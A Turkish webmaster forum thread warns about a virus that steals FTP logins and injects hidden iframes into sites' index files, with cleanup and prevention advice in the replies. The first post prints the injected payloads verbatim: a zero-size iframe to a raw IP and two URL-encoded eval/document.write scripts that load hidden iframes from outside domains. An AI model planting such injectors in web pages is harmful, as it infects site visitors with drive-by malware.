tech Posted October 2, 2007 Share Posted October 2, 2007 Son zamanlarda büyük hızla yolunda yüreyen yeni virüs bir çok webmasterin sorunu oldu ve olmayada devam ediyor.. Bu virüs bir kere bilgisayarınıza bulaştıkdan sonra o bilgisayarla hangi sitenin ftp'ini açarsanız açın girdiğiniz ftp bilgilerini kaydederek, sitelere girip index.php , index.html , index.htm , default.asp 'in içlerine iframe kodu atiyor atılan iframe kodu şu şekildedir.. <iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>[/CODE]Bu kod genelde encode edilmiş olarak atılıyor. kodun encode edilmiş hali:[codebox]<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%74%6f%6d%61%6b%61%79%61%6e%2e%62%69%7a%2f%69%6e%64%65%78%2e%70%68%70%3f%6f%75%74%3d%31%31%39%30%32%33%38%37%33%32%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%32%33%34%36%29%2b%27%62%36%39%5c%27%20%77%69%64%74%68%3d%35%39%39%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>veya<SCRIPT Language="JavaScript">document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));</SCRIPT>[/codebox]Ve Sadece www/public htm/ dizinine değil diğer bütün klasörülerin içinde bulunan index.php , index.html , index.htm , default.asp 'in içinede atıyor..Şimdiye kadar bir çok başlık gördüm bu şekilde bu virüslerden yakınan o yüzden bu yazıyı yazma gereği duydum...Virüs size nasıl bulaşır ?başka kişinin sitesine bulaşmışsa ve sizde o siteye girdiyseniz üstelik hiç bir antivirüs yüklü değilse bilgisayarınıza; Bilinki o virüs artık sizinde bilgisayarınızda ve girdiğiniz bütün ftp'lere girmeye başlayacaktır..[b]Peki Virüs Sizin Bilgisayarınıza Bulaştı ve bunun farkına vardınız ne yapmamız gerekir ?[/b]Sadece ftp bilgilerinizi alabildiği için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar ftp'den upload edin. Sonra hiç vakit kaybetmeden cpanel/plesk panelinize girin ve şifrenizi değiştirin. Bu işlemleri yaptıktan sonra sakın ftp'den giriş yapmayın. Çünkü ftp'den giriş yaptığınızda değiştirdiğiniz şifreyide alarak tekrar dosyalarıza iframe atmaya başlayacaktır.. Bu işlemleride yaptıktan sonra bilgisayarıza format atin..[b]Virüs Bana bulaşmadı Nasıl korunabilirim ?[/b]Filezilla veya cuteftp kullanarak serverinize bağlanın, index.php ,index.htm, index.html, default.asp Bütün klasörlerdeki bu saydığım uzantılı sayfalarınızın chmod değerlerini 444 yapın. Bilgisayarınıza Nod32, Panda veya Kaspersky kurun ( ben Kaspersky kullanıyorum ve çoğu sitede virüs yakaladı ama bana bulaşmadı) Bilgisayarınızı güvene alın. Her ftpye girdikten sonra direk cpanelden yada plesk paneden girerek ftp şifrenizi değiştirin. Birde bilgisayarınıza Ad-Aware SE Personal 'i kurun iki günde bir tarama yaptırın.alıntıdır...bu sorunu sanırım çözdüm ama yinede herkesin bilmesi iyi olur. Link to comment Share on other sites More sharing options...
ladikli88 Posted April 7, 2009 Share Posted April 7, 2009 evet banda bulaştı kaspersky yüklüyorum fakat çalışmıyor ne yapmam lazım bide web sitemdeki iframeleri tek tek silmekle baş olmaz toplu şekilde bi çözümü varmı acaba Link to comment Share on other sites More sharing options...
wmismail Posted April 7, 2009 Share Posted April 7, 2009 Kullanmayın kardeşim başka siteden iframe. Madem veri çekeceksin XML kullan. Link to comment Share on other sites More sharing options...
ladikli88 Posted April 7, 2009 Share Posted April 7, 2009 hayır kardeş iframeyi kullanan biz değiliz kendi kurduğum hazır portalın index.php dosyalarının içine ekliyor ve siteyi ziyaret edenlere bulaşıyor silmek çözzüm değil tekrar geliyor inş anlatabilmişimdir Link to comment Share on other sites More sharing options...
wmismail Posted April 7, 2009 Share Posted April 7, 2009 Hmm anladım O zamannn... Hazır sistem kullanmayın Link to comment Share on other sites More sharing options...
ladikli88 Posted April 7, 2009 Share Posted April 7, 2009 of of anlamamışın boşver anlayan bi arkadaş varmı acaba Link to comment Share on other sites More sharing options...
wmismail Posted April 7, 2009 Share Posted April 7, 2009 Yok ben anlamam zaten. Web bana çok uzak bi kelime.. İlk defa işte dün bilgisayar gördüm Bu günde bu siteye girdüm bakıyorum Link to comment Share on other sites More sharing options...
ladikli88 Posted April 7, 2009 Share Posted April 7, 2009 oda iyi anlıyosanda bizle gırgır geçtiğin kesin Link to comment Share on other sites More sharing options...
wmismail Posted April 7, 2009 Share Posted April 7, 2009 Webmaster'im ben 4-5 yıldır bu işi yapıyorum. Ifreme'nin kesin bir çözümü yok. Bilmediğin sistemi kullanmayacaksın yani.. Bilindik, güvenilir hazır sistem kullanacaksın veya birisine sistemini yazdıracaksın.. Eğer sendeki sistemden Iframe'yi temizlersen sistem bozulacaktır. Boşa uğraşma başka bir sisteme geç. Kolay gelsin Link to comment Share on other sites More sharing options...
tech Posted April 7, 2009 Author Share Posted April 7, 2009 evet banda bulaştı kaspersky yüklüyorum fakat çalışmıyor ne yapmam lazım bide web sitemdeki iframeleri tek tek silmekle baş olmaz toplu şekilde bi çözümü varmı acaba Bu virus silinemiyor bir türlü. Bulunamıyordu. çözüm olarak, cpanel,ftp şifreni değiştir. Sonra ftpden giriş yaptığında windows explorer veya internet explorer kullanma. Filezilla, cuteftp gibi programlar ile giriş yap birdaha bulaşmaz. yanlız önceki bozulan dosyaların hepsini temizlemelisin. Eskiden sadece index dosyalara bulaşırdı, artık tüm html ve php dosyalarına bulaşıyor galiba. Ona göre kontrol et hepsini. Son bir uyarı, asla ftpye windows explorer veya internet explorer ile tekrar giriş yapma. virus şifreni kullanarak tekrar dosyalara bulaşır. Webmaster'im ben 4-5 yıldır bu işi yapıyorum. Ifreme'nin kesin bir çözümü yok. Bilmediğin sistemi kullanmayacaksın yani..Bilindik, güvenilir hazır sistem kullanacaksın veya birisine sistemini yazdıracaksın.. Eğer sendeki sistemden Iframe'yi temizlersen sistem bozulacaktır. Boşa uğraşma başka bir sisteme geç. Kolay gelsin Bu virus, bu virüsün bulunduğu bir siteye girdiğinde pcne bulaşır. Yani bütün bilgisayarlarda var diyebiliriz Bulaştıktan sonra bişey olmaz ama sen ftpye giriş yaptığın an, şifreni kopyalar. ftpden giriş yapar ve bütün dosyaların ya sonuna, ya başına yada body etiketinden hemen sonraya iframe etiketi ekler. Çözümüde bu satırları silmek ve şifreyi değiştirmektir. Link to comment Share on other sites More sharing options...
ladikli88 Posted April 7, 2009 Share Posted April 7, 2009 teşekkürler gerçekten sonunda çözüm olabilcek bi cevap aldım teşekkürler Link to comment Share on other sites More sharing options...
Administrator sk8er_boi Posted April 7, 2009 Administrator Share Posted April 7, 2009 Virus çok feci. Tüm index, default login. php htm html asp gibi dosyalara bulaşıp biryerlerine bir satırlar ekliyor. Yapabileceğin şey, tüm dosyaları bilgisayarına çekip, bir text replace programıyla (Ecobyte ReplaceText kullandım) virüsün oluşturduğu satırları toplu olarak düzenleyip yeniden upload etmek. Ve yedek almak. Ayrıca wmismail'e anlatmak için uğraşma Link to comment Share on other sites More sharing options...
wmismail Posted April 7, 2009 Share Posted April 7, 2009 Ayrıca wmismail'e anlatmak için uğraşma Abi niye ? Link to comment Share on other sites More sharing options...
ladikli88 Posted April 7, 2009 Share Posted April 7, 2009 Virus çok feci. Tüm index, default login. php htm html asp gibi dosyalara bulaşıp biryerlerine bir satırlar ekliyor. Yapabileceğin şey, tüm dosyaları bilgisayarına çekip, bir text replace programıyla (Ecobyte ReplaceText kullandım) virüsün oluşturduğu satırları toplu olarak düzenleyip yeniden upload etmek. Ve yedek almak.Ayrıca wmismail'e anlatmak için uğraşma tamam saolasın Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.